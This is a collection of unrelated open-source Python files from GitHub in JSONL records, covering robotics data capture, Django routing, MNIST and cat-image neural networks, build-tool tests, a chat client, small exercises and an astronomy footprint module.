self.grasping_frame, rospy.Time())\n try:\n # TODO make this more sensitive to lost TFs while avoiding extrapolation into the future exception\n (_, 
Qwo) = self.li.lookupTransform(self.world_frame, self.object_frame, rospy.Time())\n (_, Qgo) = self.li.lookupTransform(self.grasping_frame, self.object_frame, rospy.Time())\n except Exception as e:\n pass\n # print(f\"ERROR couldn't get transform. ¿is the object being detected?\\n{e}\")\n # return False\n\n now = datetime.now().strftime(datefmt)\n\n Qwg = np.array(Qwg)\n # Qgo = np.array(Qgo)\n # Qwo = np.array(Qwo)\n\n # preprocess data\n mm = np.squeeze(np.stack([self.mm_left.copy(), self.mm_right.copy()]))\n # lblth = line_angle_from_rotation(Qgo)\n\n sname = f\"{self.count}_{now}\"\n with open(f\"{self.save_path}/{sname}.pkl\", \"wb\") as f:\n pickle.dump({\n \"mm\": mm,\n \"joints\": self.js,\n \"ft\": self.ft,\n \"Qwg\": Qwg,\n # \"Qgo\": Qgo,\n # \"Qwo\": Qwo\n }, f)\n \n scale=100\n fig, ax = plt.subplots(ncols=1, figsize=0.8*np.array([10,9]))\n\n lines = [\n # [lblth, f\"OptiTrack (lblth)\", \"green\"],\n ]\n models_theta_plot(\n mm_imgs=mm,\n noise_thresh=0.0,\n ax=ax,\n fig=fig,\n scale=scale,\n lines=lines\n )\n\n ax.set_title(f\"sample {self.count}@{now}\")\n fig.tight_layout()\n fig.canvas.draw()\n fig.savefig(f\"{self.pics_path}{sname}.png\")\n\n # Now we can save it to a numpy array.\n data = np.frombuffer(fig.canvas.tostring_rgb(), dtype=np.uint8)\n data = data.reshape(fig.canvas.get_width_height()[::-1] + (3,))\n\n imgmsg = self.bridge.cv2_to_imgmsg(data, encoding=\"rgb8\")\n self.imgpub.publish(imgmsg)\n plt.close()\n\n self.reset_data()\n self.count += 1\n print(\"done.\")\n\n \n\nif __name__ == \"__main__\":\n\n rospy.init_node(\"collect_data\")\n save_path = f\"{dataset_path}cloth2/no_cloth\"\n dc = DataCollector(save_path)\n\n print(f\"saving data in {save_path}\")\n while not rospy.is_shutdown():\n a = input()\n if a.lower() == \"q\": break\n # for _ in range(5):\n dc.collect()\n time.sleep(0.3)\n","repo_name":"llach/learn_placing","sub_path":"execute_placing/collect_data.py","file_name":"collect_data.py","file_ext":"py","file_size_in_byte":5097,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"21895687395","text":"\nfrom django.conf.urls import patterns, url, include\n\nfrom django.contrib import admin\n\nfrom django.conf import settings\nfrom django.conf.urls.static import static\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n # Examples:\n # url(r'^$', 'pb.views.home', name='home'),\n # url(r'^blog/', include('blog.urls')),\n url(r'^admin/', include(admin.site.urls)),\n\n #(r'^js/(?P.*)$','django.views.static.serve',{'document_root':settings.JS_STATIC_PATH}),\n \n #(r'^css/(?P.*)$','django.views.static.serve',{'document_root':settings.CSS_STATIC_PATH}),\n \n #(r'^html/(?P.*)$','django.views.static.serve',{'document_root':settings.HTML_STATIC_PATH}),\n \n #(r'^images/(?P.*)$','django.views.static.serve',{'document_root':settings.IMAGES_STATIC_PATH}),\n \n url(r'^$', 'pb.views.index'),\n\n (r'^static/(?P.*)$','django.views.static.serve',{'document_root':settings.STATICFILES_DIRS,'show_indexes': True}),\n \n url(r'^index$', 'pb.views.index'),\n \n url(r'^about$', 'pb.views.about'),\n \n url(r'^list$', 'pb.views.list'),\n \n url(r'^editor$', 'pb.views.editor'),\n \n url(r'^pagelist', 'pb.views.pagelist'),\n) \n","repo_name":"zimuxh/pb","sub_path":"pb/src/pb/pb/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1206,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15218351326","text":"\n# coding: utf-8\n\n# Reference : \n# 
https://github.com/uosdmlab/tensorflow-tutorial/blob/master/notebooks/4.MNIST%20with%20CNN.ipynb\n# https://www.kaggle.com/innerproduct/state-farm-distracted-driver-detection/tensorflow\n\n# In[2]:\n\nimport pandas as pd\nimport tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\nDROPOUT=0.5\nTRAINING_ITERATIONS =10000\nLEARNING_RATE = 1e-4\nValidation_size=1000\nBATCH_SIZE=50\n\n\n# In[3]:\n\ndata=pd.read_csv('~/Documents/GIT_HUB/MNIST/train.csv')\n\n\n# In[4]:\n\nimages=data.iloc[:,1:].values.astype(np.float);\nimages=np.multiply(images,1.0/255.0);\n#this is done to change the shape of the array\nimage_size=images.shape[1]\nimage_width = image_height = np.ceil(np.sqrt(image_size)).astype(np.uint8)\n\n\n# In[5]:\n\nlabels_count=data[[0]].values.ravel()\nlabel = np.unique(labels_count).shape[0]\n\n\n# In[6]:\n\ndef dense(labels_dense, num_classes):\n num_labels = labels_dense.shape[0]\n res=np.zeros(shape=(num_labels,num_classes));\n for i in range (0,num_labels):\n res[i,labels_dense[i]]=1;\n return res;\n\nhot_label=dense(labels_count,label);\nhot_label = hot_label.astype(np.uint8)\n\n\n# In[7]:\n\nvalidation_images=images[:Validation_size]\nvalidation_labels=hot_label[:Validation_size]\ntrain_images=images[Validation_size:]\ntrain_labels=hot_label[Validation_size:]\n\n\n# Added guassian layer to increase the number of samples , by adding another layer we were able to generate more number of training samples.\n# \n\n# In[8]:\n\n# weight initialization\ndef w_variable(shape):\n initial = tf.truncated_normal(shape, stddev=0.1)\n return tf.Variable(initial)\ndef b_variable(shape):\n initial = tf.constant(0.1, shape=shape)\n return tf.Variable(initial)\ndef conv2d(x, W):\n return tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding='SAME')\ndef mpool(x):\n return tf.nn.max_pool(x, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')\ndef gaussian_noise_layer(input_layer, std):\n noise = tf.random_normal(shape=tf.shape(input_layer), mean=0.0, stddev=std, dtype=tf.float32) \n return input_layer + noise\n\n\n# In[9]:\n\nepochs_completed = 0\nindex_in_epoch = 0\nnum_examples = train_images.shape[0]\n# serve data by batches\ndef next_batch(batch_size):\n global train_images\n global train_labels\n global index_in_epoch\n global epochs_completed\n start = index_in_epoch\n index_in_epoch += batch_size\n # when all trainig data have been already used, it is reorder randomly \n if index_in_epoch > num_examples:\n # finished epoch\n epochs_completed += 1\n # shuffle the data\n perm = np.arange(num_examples)\n np.random.shuffle(perm)\n train_images = train_images[perm]\n train_labels = train_labels[perm]\n # start next epoch\n start = 0\n index_in_epoch = batch_size\n assert batch_size <= num_examples\n end = index_in_epoch\n return train_images[start:end], train_labels[start:end]\n\n\n# In[10]:\n\nstd=tf.placeholder('float');\nx = tf.placeholder('float', shape=[None, image_size]);\n#W=tf.placeholder('float',shape=[images.shape[1],10])\ny_=tf.placeholder('float',shape=[None,label])\ntrain_=tf.placeholder('int32');\nkeep_prob = tf.placeholder('float')\nkeep_prob1 = tf.placeholder('float')\n\n\n# In[11]:\n\nW_conv1 = w_variable([5, 5, 1, 32])\nb_conv1 = b_variable([32])\nimage = tf.reshape(x, [-1,image_width , image_height,1]);\nif train_==1:\n image=gaussian_noise_layer(image,std);\n resized_image = tf.image.resize_images(image, [32, 32])\n distorted_image = tf.random_crop(resized_image, [28, 28, 1])\n distorted_image = tf.image.random_brightness(distorted_image, max_delta=63)\n 
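# NOTE: train_ is a tf.placeholder, so the Python comparison train_==1 above is\n    # evaluated once while the graph is being built (it is not a TF op) and is\n    # False there, which makes this augmentation branch dead code as written.\n    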
distorted_image = tf.image.random_contrast(distorted_image, lower=0.2, upper=1.8)\n image = tf.image.per_image_whitening(distorted_image)\ngraph = tf.get_default_graph()\nh_conv1 = tf.nn.relu(conv2d(image, W_conv1) + b_conv1)\nh_pool1 = mpool(h_conv1)\n#h_pool1 = tf.nn.dropout(h_pool1,keep_prob1);\n# second convolutional layer\nW_conv2 = w_variable([5, 5, 32, 64])\nb_conv2 = b_variable([64])\nh_conv2 = tf.nn.relu(conv2d(h_pool1, W_conv2) + b_conv2)\nh_pool2 = mpool(h_conv2)\nW_conv3=w_variable([1,1,64,64])\nb_conv3=b_variable([64])\nh_pool2=tf.nn.relu(conv2d(h_pool2,W_conv3)+b_conv3);\n#h_pool2 = tf.nn.dropout(h_pool2,keep_prob1);\nW_fc1 = w_variable([7 * 7 * 64, 1024])\nb_fc1 = b_variable([1024])\nh_pool2_flat = tf.reshape(h_pool2, [-1, 7*7*64])\nh_fc1 = tf.nn.relu(tf.matmul(h_pool2_flat, W_fc1) + b_fc1)\nh_fc1_drop = tf.nn.dropout(h_fc1, keep_prob)\n#this is the output layer\nW_fc2 = w_variable([1024, label])\nb_fc2 = b_variable([label])\ny = tf.nn.log_softmax(tf.matmul(h_fc1_drop, W_fc2) + b_fc2)\n# optimisation function\ncross_entropy = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=y_, logits=y))\ntrain_step = tf.train.AdamOptimizer(LEARNING_RATE).minimize(cross_entropy)\ncorrect_prediction = tf.equal(tf.argmax(y,1), tf.argmax(y_,1))\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, 'float'))\npredict = tf.argmax(y,1)\ninit = tf.initialize_all_variables()\nsess = tf.InteractiveSession()\nsaver = tf.train.Saver()\n\n\n# In[12]:\n\ncheck=input('Enter do you wanna load file or run a new model(yes/no)');\nif check=='yes' or check=='YES':\n LOAD_FILE=input(\"Enter the name of the model to load the tensorflow model\");\n try:\n saver = tf.train.import_meta_graph(LOAD_FILE+'.meta');\n saver.restore(sess, LOAD_FILE)\n except :\n print('File Do not exist')\nelse:\n sess.run(init)\n SAVING_FILE=input(\"Enter the name of the model to save the tensorflow\");\n# evaluation\n\n\n# In[14]:\n\n# visualisation variables\ntrain_accuracies = []\nvalidation_accuracies = []\nx_range = []\ndisplay_step=1\nfor i in range(TRAINING_ITERATIONS):\n #get new batch\n batch_xs, batch_ys = next_batch(50) \n if(i%100==0):\n print(\"step:\"+str(i))\n if(Validation_size):#this is done to make sure that in case we make validation size 0 , we can simply avoid printing it\n validation_accuracies.append(sess.run(accuracy,feed_dict={x:validation_images,y_:validation_labels,keep_prob:1.0,std:0.0,train_:0}));\n train_accuracies.append((sess.run(accuracy,feed_dict={x:batch_xs,y_:batch_ys,keep_prob:1.0,std:0.0,train_:0})));\n print(\"Validation Accuracy:\"+str(validation_accuracies[len(validation_accuracies)-1])); \n sess.run(train_step, feed_dict={x: batch_xs, y_: batch_ys, keep_prob: DROPOUT,std:0.001,train_:1})\nif check=='Yes' or check=='yes':\n check_1=input(\"Do you want to save file with same name or not?(yes/No)\");\n if(check_1=='no'):\n temp=input(\"File name\");\n saver.save(sess,temp);\n else:\n saver.save(sess,LOAD_FILE);\nelse:\n saver.save(sess, SAVING_FILE);#this is where we save our training model which can be used later\n\n\n# In[ ]:\n\nprint(validation_accuracies[len(validation_accuracies)-1]);\nline1=plt.plot(train_accuracies,label='Training Value')\nline2=plt.plot(validation_accuracies,label='Validation Value')\nplt.legend(loc=4)\nplt.ylabel('Accuracies->');\nplt.xlabel('Iterations(x100)->');\nplt.show()\n\n\n# In[ ]:\n\n\n\n\n# 
\n","repo_name":"karangoel16/MNIST","sub_path":"TENSORFLOW_MNIST.py","file_name":"TENSORFLOW_MNIST.py","file_ext":"py","file_size_in_byte":7045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27765888699","text":"import os\nfrom pathlib import Path\n\nfrom pants.base.build_environment import get_buildroot\nfrom pants.option.scope import GLOBAL_SCOPE_CONFIG_SECTION\nfrom pants.testutil.pants_run_integration_test import PantsRunIntegrationTest\n\n\nclass RunnerIntegrationTest(PantsRunIntegrationTest):\n \"\"\"Test logic performed in PantsRunner.\"\"\"\n\n def test_warning_filter(self):\n # We load the testprojects pants-plugins to get some testing tasks and subsystems.\n cmdline = [\n \"--no-enable-pantsd\",\n f\"--pythonpath=+['{Path(get_buildroot(), 'testprojects/pants-plugins/src/python')}']\",\n \"--backend-packages=+['test_pants_plugin']\",\n # This task will always emit a DeprecationWarning.\n \"deprecation-warning-task\",\n ]\n\n warning_run = self.run_pants(cmdline)\n self.assert_success(warning_run)\n self.assertRegex(\n warning_run.stderr_data,\n \"\\\\[WARN\\\\].*DeprecationWarning: DEPRECATED: This is a test warning!\",\n )\n\n non_warning_run = self.run_pants(\n cmdline,\n config={\n GLOBAL_SCOPE_CONFIG_SECTION: {\n # NB: We do *not* include the exclamation point at the end, which tests that the regexps\n # match from the beginning of the warning string, and don't require matching the entire\n # string! We also lowercase the message to check that they are matched case-insensitively.\n \"ignore_pants_warnings\": [\"deprecated: this is a test warning\"]\n },\n },\n )\n self.assert_success(non_warning_run)\n self.assertNotIn(\"test warning\", non_warning_run.stderr_data)\n\n def test_parent_build_id_set_only_for_pants_runs_called_by_other_pants_runs(self):\n with self.temporary_workdir() as workdir:\n command = [\n \"run\",\n \"testprojects/src/python/nested_runs\",\n \"--\",\n workdir,\n ]\n result = self.run_pants_with_workdir(command, workdir,)\n self.assert_success(result)\n\n run_tracker_dir = os.path.join(workdir, \"run-tracker\")\n self.assertTrue(\n os.path.isdir(run_tracker_dir), f\"dir path {run_tracker_dir} does not exist!\"\n )\n run_tracker_sub_dirs = (\n os.path.join(run_tracker_dir, dir_name)\n for dir_name in os.listdir(run_tracker_dir)\n if dir_name != \"latest\"\n )\n for run_tracker_sub_dir in run_tracker_sub_dirs:\n info_path = os.path.join(run_tracker_sub_dir, \"info\")\n self.assert_is_file(info_path)\n with open(info_path, \"r\") as info_f:\n lines = dict(line.split(\": \", 1) for line in info_f.readlines())\n if \"goals\" in lines[\"cmd_line\"]:\n self.assertIn(\"parent_build_id\", lines)\n else:\n self.assertNotIn(\"parent_build_id\", lines)\n","repo_name":"mgrenonville/pants","sub_path":"tests/python/pants_test/bin/test_runner_integration.py","file_name":"test_runner_integration.py","file_ext":"py","file_size_in_byte":3075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"25610152378","text":"#! 
/usr/bin/env python \n#coding:utf-8\n'''\nCreated on May 18, 2016\n\n@author: chenzhen\n'''\nfrom asynchat import async_chat\nimport socket\nimport asyncore\nimport wx\n\nclass Client(async_chat):\n    def __init__(self, host, port, window):\n        self.window = window\n        self.data = []\n        async_chat.__init__(self)\n        self.create_socket(socket.AF_INET, socket.SOCK_STREAM)\n        self.connect((host, port))\n        \n        self.window.button.Bind(wx.EVT_BUTTON, self.OnSend)\n        \n    def handle_connect(self, text='hello**end**'):\n        self.push(text)\n        #self.push('hello**end**')\n        \n        #self.window.button.Bind(wx.EVT_BUTTON, self.OnSend)\n        self.set_terminator('\\r\\n')\n        \n    def collect_incoming_data(self, data):\n        data = data.decode('utf8')\n        self.data.append(data)\n        \n    def found_terminator(self):\n        receive_message = ''.join(self.data) + '\\r\\n'\n        self.data = []\n        self.window.control.WriteText(receive_message)\n        \n    def OnSend(self, event):\n        if self.window.control2.GetValue():\n            message = self.window.control2.GetValue().encode('utf8') + \"**end**\"\n            self.send(message)\n            self.window.control2.SetValue('')\n\n    \n    \n    \nif __name__ == '__main__':\n    # NOTE: Client expects a wx window object; passing this string will raise\n    # AttributeError as soon as __init__ touches window.button.\n    message = 'adjfdjfjjdf**end**'\n    client = Client('localhost', 8080, message)\n    asyncore.loop()\n\n    \n","repo_name":"czsvn/GTalk","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} 
+{"seq_id":"47463486330","text":"\"\"\" created by stips on 24.10.18. using PyCharm , python_version = 3.5 \"\"\"\n\ndef iterativnaOkretaljka(lista, start, stop):\n    '''\n    Reverses the elements of lista from the start index to the stop index.\n    The for loop runs (number of elements between the indices) // 2 times.\n    :param lista:\n    :param start:\n    :param stop:\n    :return:\n    '''\n    for i in range((stop-start+1)//2):\n        lista[start+i], lista[stop-i] = lista[stop-i], lista[start+i]\n    return lista\n\ndef rekurzivnaOkretaljkaNoSlice(lista, start, stop, i = 0):\n    '''\n    Exit condition: half of the range has been traversed.\n    Otherwise swap the outermost remaining pair with plain element\n    assignments (no slicing) and recurse inward.\n    :param lista:\n    :param start:\n    :param stop:\n    :param i:\n    :return:\n    '''\n    if i == (stop - start + 1) // 2:\n        return lista\n    lista[start + i], lista[stop - i] = lista[stop - i], lista[start + i]\n    i += 1\n    return rekurzivnaOkretaljkaNoSlice(lista, start, stop, i)\n\ndef rekurzivnaOkretaljkaSlice(lista, start, stop):\n    '''\n    Exit condition: the two indices have met or crossed.\n    Otherwise swap the outermost pair via one-element slices and recurse inward.\n    :param lista:\n    :param start:\n    :param stop:\n    :return:\n    '''\n    if stop - start < 1:\n        return lista\n    lista[start:start + 1], lista[stop:stop + 1] = lista[stop:stop + 1], lista[start:start + 1]\n    return rekurzivnaOkretaljkaSlice(lista, start + 1, stop - 1)\n\nif __name__ == '__main__':\n    lst = [2, 4, 6, 3, 9, 'a']\n\n    print(\"Original\", lst)\n\n    print(\"Iteratively swapped\", iterativnaOkretaljka(lst, 1, 4))\n    print(\"Recursively swapped\", rekurzivnaOkretaljkaNoSlice(lst, 1, 4))\n    print(\"Recursively slice-swapped\", rekurzivnaOkretaljkaSlice(lst, 1, 4))","repo_name":"Stips5/Metode-optimizacije","sub_path":"vjezba2/medak_stipan_zadatak2.py","file_name":"medak_stipan_zadatak2.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"bs","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} 
+{"seq_id":"3290189236","text":"# -*- coding: utf-8\r\n#\r\n# Program accompanying the textbook\r\n# K.Yu. Polyakov. 
Programming in Python and C++\r\n# Part 2 (grade 9)\r\n# Program No. 29. Linear search\r\n#\r\n\r\nA = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\r\nN = len(A)\r\nX = 6\r\ni = 0\r\nwhile i < N and A[i] != X:\r\n    i += 1\r\n\r\nif i < N:\r\n    print( \"A[{}]={}\".format(i,X) )\r\nelse:\r\n    print( \"Not found!\" )\r\n\r\nnX = -1\r\nfor i in range(N):\r\n    if A[i] == X:\r\n        nX = i\r\n        break\r\n\r\nif nX >= 0:\r\n    print( \"A[{}]={}\".format(i,X) )\r\nelse:\r\n    print( \"Not found!\" )\r\n\r\nfor i in range(N):\r\n    if A[i] == X:\r\n        print( \"A[{}]={}\".format(i,X) )\r\n        break\r\nelse:\r\n    print( \"Not found!\" )\r\n\r\nif X in A:\r\n    nX = A.index(X)\r\n    print( \"A[{}]={}\".format(nX,X) )\r\nelse:\r\n    print( \"Not found!\" )\r\n\r\n\r\n","repo_name":"olgaObnosova/EGE","sub_path":"9prog_python/29-arrays-search.py","file_name":"29-arrays-search.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} 
+{"seq_id":"38749995193","text":"from .ValidatorBase import ValidatorBase\nfrom Models import Session, Term\n\nclass TermValidator(ValidatorBase):\n    \"\"\"Configures the Term validator so that the parent class applies the validators correctly.\"\"\"\n\n    def __init__(self, obj_data):\n        \"\"\"Gets the object data that will be validated and initializes the configurations.\"\"\"\n\n        self.request = obj_data\n\n        self.validate_config = {\n            'name': {\n                'key_required': True,\n                'field_required': True,\n                'max_length': 100,\n                'min_length': 1,\n                'is_unique': True\n            },\n            'display_name': {\n                'key_required': True,\n                'field_required': True,\n                'max_length': 100,\n                'min_length': 1\n            },\n            'description': {\n                'key_required': True,\n                'max_length': 255\n            },\n            'parent_id': {\n                'is_integer': True\n            },\n            'page_id': {\n                'is_integer': True\n            },\n            'taxonomy_id': {\n                'key_required': True,\n                'field_required': True,\n                'is_integer': True\n            },\n            'language_id': {\n                'key_required': True,\n                'field_required': True,\n                'is_integer': True\n            }\n        }\n\n        self.errors = []\n        self.has_error = False\n        self.complete_key_list = True\n        self.model = Term\n        self.session = Session\n","repo_name":"welisonmenezes/comsys","sub_path":"application/api/Validators/TermValidator.py","file_name":"TermValidator.py","file_ext":"py","file_size_in_byte":1551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} 
+{"seq_id":"70338485992","text":"import xlwt\nimport pandas as pd\nfrom collections import OrderedDict\nimport os\nfrom functools import reduce\n\nscript = os.path.dirname(__file__)\nprint(script)\nhead_list = ['', '']\n\ndata_dict = OrderedDict()\n\ndata = pd.DataFrame(data_dict, index=head_list)\n# mean_data is a pandas Series\nmean_data = data.mean(axis=1)\nlist_mean = [round(i, 2) for i in mean_data]\nmean_value = reduce(lambda x, y: x + y, list_mean) / len(list_mean)\nlist_mean.append(mean_value)\ndata_dict[\"Mean\"] = list_mean\n\n# xlwt can only write the legacy .xls format, so use an .xls extension\noutfile = os.path.join(script, \"result.xls\")\nwriter = xlwt.Workbook()\nws = writer.add_sheet('sheet1')\nfor index, head in enumerate(head_list):\n    ws.write(0, index + 1, head)\n\ncount = 1\nfor key, values in data_dict.items():\n    ws.write(count, 0, key)\n    for index, value in enumerate(values):\n        ws.write(count, index + 1, value)\n    count += 1\nwriter.save(outfile)\n","repo_name":"zbh123/hobby","sub_path":"数据处理/excel文件写入.py","file_name":"excel文件写入.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} 
+{"seq_id":"36475242604","text":"\"\"\"\nUm posto está vendendo combustíveis com a seguinte tabela de descontos:\n\n a. Álcool:\n b. até 20 litros, desconto de 3% por litro\n c. acima de 20 litros, desconto de 5% por litro\n d. Gasolina:\n e. até 20 litros, desconto de 4% por litro\n f. acima de 20 litros, desconto de 6% por litro\n\n Escreva um algoritmo que leia o número de litros vendidos, o tipo de combustível\n (codificado da seguinte forma: A-álcool, G-gasolina),\n calcule e imprima o valor a ser pago pelo cliente sabendo-se que o preço do litro da gasolina é R$ 2,50\n o preço do litro do álcool é R$ 1,90.\n\"\"\"\n\nlitros = int(input('Quantidade de litros colocado? '))\nforma = input('Álcool ou Gasolina? (A-álcool, G-gasolina) ').upper()\nprecolitro = 0\npreco = 0\n\nif forma == 'A':\n if litros <= 20:\n precolitro = 1.843\n preco = litros * precolitro\n print(f'O valor a ser pago será de R${preco:.2f}, sendo colocado {litros} litros de álcool.')\n elif litros > 20:\n precolitro = 1.805\n preco = litros * precolitro\n print(f'O valor a ser pago será de R${preco:.2f}, sendo colocado {litros} litros de álcool.')\nelif forma == 'G':\n if litros <= 20:\n precolitro = 2.4\n preco = litros * precolitro\n print(f'O valor a ser pago será de R${preco:.2f}, sendo colocado {litros} litros de gasolina.')\n elif litros > 20:\n precolitro = 2.35\n preco = litros * precolitro\n print(f'O valor a ser pago será de R${preco:.2f}, sendo colocado {litros} litros de gasolina.')\n","repo_name":"fredy-prudente/python-brasil-exercicios","sub_path":"Estrutura De Decisao/ex26.py","file_name":"ex26.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6328436816","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\n#import packages\nfrom keras.models import model_from_json\nimport tensorflow as tf\nimport numpy as np\nfrom tensorflow import keras\nimport glob\n\n\n# In[1]:\n\n\n#preprocess the images and keep a list of the unprocessed images.\ndef process_images(data_path):\n files = glob.glob(data_path)\n data = []\n for f1 in files:\n img = keras.preprocessing.image.load_img(f1)\n #[m,n,k] = np.shape(img)\n #switch when new model is trained\n [m,n,k] = 64,64,3\n img_array = keras.preprocessing.image.load_img(f1, target_size=(m,n,k))\n img_array = keras.preprocessing.image.img_to_array(img_array)\n img_array /= 255\n img_array = tf.expand_dims(img_array, 0) # Create batch axis\n data.append(img_array)\n \n return data\n\n\n# In[12]:\n\n\n#use the CNN to predict if any of the images are likely to be cats and populate list if they are\ndef final_answer(data,loaded_model):\n is_cat = np.zeros(len(data))\n for i,img in enumerate(data):\n if loaded_model.predict(img)[0] > .5:\n is_cat[i] = 1\n return is_cat\n\n\n# In[9]:\n\n\nif __name__ == \"__main__\": \n process_images()\n final_answer()\n\n","repo_name":"mont-grunthal/CatFinder","sub_path":"CNN.py","file_name":"CNN.py","file_ext":"py","file_size_in_byte":1212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3122120729","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n'''footprints.py - Waqas Bhatti (wbhatti@astro.princeton.edu) - Sep 2018\nLicense: MIT - see the LICENSE file for the full text.\n\nThis contains functions that get info about LC collection footprints.\n\n'''\n\n#############\n## LOGGING ##\n#############\n\nimport logging\nfrom lccserver import log_sub, log_fmt, 
log_date_fmt\n\nDEBUG = False\nif DEBUG:\n level = logging.DEBUG\nelse:\n level = logging.INFO\nLOGGER = logging.getLogger(__name__)\nlogging.basicConfig(\n level=level,\n style=log_sub,\n format=log_fmt,\n datefmt=log_date_fmt,\n)\n\nLOGDEBUG = LOGGER.debug\nLOGINFO = LOGGER.info\nLOGWARNING = LOGGER.warning\nLOGERROR = LOGGER.error\nLOGEXCEPTION = LOGGER.exception\n\n#############\n## IMPORTS ##\n#############\n\nimport pickle\nimport os.path\nimport math\nimport subprocess\nimport shutil\n\nimport numpy as np\nfrom scipy.spatial import Delaunay\n\ntry:\n from astropy.coordinates import SkyCoord\n\n from shapely.ops import cascaded_union, polygonize\n import shapely.geometry as geometry\n from shapely.geometry.polygon import Polygon\n from shapely.geometry.multipolygon import MultiPolygon\n\n import matplotlib\n import matplotlib.patheffects as path_effects\n matplotlib.use('Agg')\n import matplotlib.pyplot as plt\n import scour\n\nexcept ImportError:\n raise ImportError(\n \"The following packages must be installed (via pip) \"\n \"to use this module: \"\n \"matplotlib>=2.0, shapely>=1.6, astropy>=3.0, and scour>=0.37\"\n )\n\n\nfrom .dbsearch import sqlite_column_search\nfrom .datasets import results_limit_rows, results_random_sample\n\n\n#################\n## ALPHA SHAPE ##\n#################\n\n# generating a concave hull (or \"alpha shape\") of RADEC coverage, using the\n# Delaunay triangulation and removing triangles with too large area.\n#\n# originally from:\n# http://blog.thehumangeo.com/2014/05/12/drawing-boundaries-in-python/\n#\ndef alpha_shape(points, alpha):\n \"\"\"Compute the alpha shape (concave hull) of a set of points.\n\n https://en.wikipedia.org/wiki/Alpha_shape\n\n @param points: Iterable container of points.\n @param alpha: alpha value to influence the\n gooeyness of the border. 
Smaller numbers\n don't fall inward as much as larger numbers.\n Too large, and you lose everything!\n\n The returned things are:\n\n a shapely.Polygon object, a list of edge points\n\n To get a list of points making up the Polygon object, do:\n\n >>> extcoords = np.array(concave_hull.exterior.coords)\n\n \"\"\"\n if len(points) < 4:\n # When you have a triangle, there is no sense\n # in computing an alpha shape.\n return geometry.MultiPoint(list(points)).convex_hull\n\n def add_edge(edges, edge_points, coords, i, j):\n \"\"\"\n Add a line between the i-th and j-th points,\n if not in the list already\n \"\"\"\n if (i, j) in edges or (j, i) in edges:\n # already added\n return\n\n edges.add( (i, j) )\n edge_points.append(coords[ [i, j] ])\n\n tri = Delaunay(points)\n edges = set()\n edge_points = []\n # loop over triangles:\n # ia, ib, ic = indices of corner points of the\n # triangle\n for ia, ib, ic in tri.simplices:\n pa = points[ia]\n pb = points[ib]\n pc = points[ic]\n # Lengths of sides of triangle\n a = math.sqrt((pa[0]-pb[0])**2 + (pa[1]-pb[1])**2)\n b = math.sqrt((pb[0]-pc[0])**2 + (pb[1]-pc[1])**2)\n c = math.sqrt((pc[0]-pa[0])**2 + (pc[1]-pa[1])**2)\n # Semiperimeter of triangle\n s = (a + b + c)/2.0\n # Area of triangle by Heron's formula\n area = math.sqrt(s*(s-a)*(s-b)*(s-c))\n circum_r = a*b*c/(4.0*area)\n # Here's the radius filter.\n # print circum_r\n if circum_r < 1.0/alpha:\n add_edge(edges, edge_points, points, ia, ib)\n add_edge(edges, edge_points, points, ib, ic)\n add_edge(edges, edge_points, points, ic, ia)\n m = geometry.MultiLineString(edge_points)\n triangles = list(polygonize(m))\n return cascaded_union(triangles), edge_points\n\n\n############################################\n## CONVEX HULL AND ALPHA SHAPE GENERATION ##\n############################################\n\ndef collection_convex_hull(basedir,\n collection,\n randomsample=None,\n limit=None,\n conditions='(ndet > 49)',\n hull_buffer=0.5):\n '''This gets the convex hull for an LC collection.\n\n conditions is a filter string to be passed into the\n dbsearch.sqlite_column_search function.\n\n '''\n\n # get the ra/dec\n res = sqlite_column_search(basedir,\n getcolumns=['ra','decl'],\n conditions=conditions,\n lcclist=[collection])\n\n if res and len(res[collection]['result']) > 0:\n\n rows = res[collection]['result']\n\n if randomsample is not None:\n rows = results_random_sample(rows, sample_count=randomsample)\n\n if limit is not None:\n rows = results_limit_rows(rows,\n rowlimit=limit,\n incoming_userid=1,\n incoming_role='superuser')\n\n ra = np.array([x['ra'] for x in rows])\n decl = np.array([x['decl'] for x in rows])\n points = np.column_stack((ra, decl))\n\n # now generate a shapely convex_hull object that we can pickle\n shapely_points = geometry.MultiPoint(list(points))\n shapely_convex_hull = shapely_points.convex_hull\n if hull_buffer is not None:\n shapely_convex_hull = shapely_convex_hull.buffer(hull_buffer)\n\n return (\n shapely_convex_hull,\n np.array(shapely_convex_hull.exterior.coords)\n )\n\n else:\n\n LOGERROR('no objects found in collection: %s with conditions: %s' %\n (collection, conditions))\n\n\ndef collection_alpha_shape(basedir,\n collection,\n alpha=0.7,\n randomsample=None,\n limit=None,\n conditions='(ndet > 49)',\n hull_buffer=0.5):\n '''This gets the alpha shape (concave hull) for an LC collection.\n\n conditions is a filter string to be passed into the\n dbsearch.sqlite_column_search function.\n\n '''\n # get the 